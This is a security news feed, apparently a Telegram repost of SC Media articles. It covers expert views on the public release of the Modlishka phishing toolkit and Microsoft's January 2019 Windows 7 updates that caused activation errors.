"Releasing a tool allows organisations to test their defences and also build new defences for that specific tool," Cesar Cerrudo, CTO at ethical hacking outfit IOActive, told SC. "There are benefits for organisations that are proactive on security to use these kinds of tools. By doing so they can better understand what they are defending against in order to create new IDS rules, train the users, and ultimately strengthen their overall security posture."

Matthew Hall, penetration test team leader at Sec-1, part of the Claranet Cyber Security Unit, was quick to point out that exploit kits like Modlishka are nothing new. "This form of phishing and man-in-the-middle platform has previously been implemented by the evilginx project over two years ago," Hall told SC. "Publishing any exploitation toolkit demonstrates how simple it is for a malicious person to attack systems and users, and thus encourages businesses and users to improve defences and recovery capabilities against layered attacks."

While these kind of tools have, indeed, been available to security firms and black hats alike for the longest time, they don't tend to find their way into the public domain for fear of exposing the exploit techniques in use and therefore enabling them to be neutralised. A point made by Thomas Richards, associate principal consultant at Synopsys, who told SC, "Releasing this tool to the public allows for enterprises to understand how to the tool works and create detection or prevention techniques to stop the tool."

So, what should enterprises be doing to ensure that their networks are not susceptible to exploit kits such as Modlishka?


Microsoft updates brick Windows 7 devices

Microsoft Corp. this Tuesday released two software updates that reportedly rendered some Windows 7-based machines useless by mistake.

The problem springs from the implementation of Microsoft’s 8 January, 2019, security-only update KB4480960 or Monthly Rollup update KB4480970, in combination with older update KB971033, whose previous iteration dates back to April 2018.

The two more recent updates introduced new protections against the Spectre and Meltdown side-channel vulnerabilities, fixed a session isolation bug affecting PowerShell remote endpoints, and patched various other Windows offerings. The other, KB971033, updated the activation and validation components found in Windows Activation Technologies, which help users confirm they are running a genuine version of Windows 7 on their computers.

A 9 January post and subsequent thread on Reddit’s sysadmin forum addressed the error. "Woke up this morning to find a few thousand Windows 7 VDI machines reporting that Windows 7 wasn’t genuine," the sysadmin’s original post said. "After much troubleshooting we found that KB971033 (should not have been installed in a KMS environment in the first place) was installed on these machines. Until today having this KB installed hasn’t been an issue, it appears a change to how Microsoft’s activation servers respond to a standard KMS key being sent to them may be to blame."

KSM stands for Microsoft’s Key Management Service, which allows users to automatically activate volume license editions of Windows and Office.

Both Microsoft 8 January updates also reference the unexpected glitch in a subsection titled "Known issues in this update."

"After installing this update, some users are reporting the KSM Activation error, ‘Not Genuine’, 0xc004f200 on Windows 7 devices," the company advisory said. "We are aware of this incident and are presently investigating it. We will provide an update when available."

In the Reddit post, the sysadmin said that one way users can resolve the issue is by "removing the update, deleting the KMS cache and activation data from the PCs and re-activating against KMS."

This article was originally published on SC Media US.

📡@cRyPtHoN_INFOSEC_EN

Показано 20 последних публикаций.

25

подписчиков
Статистика канала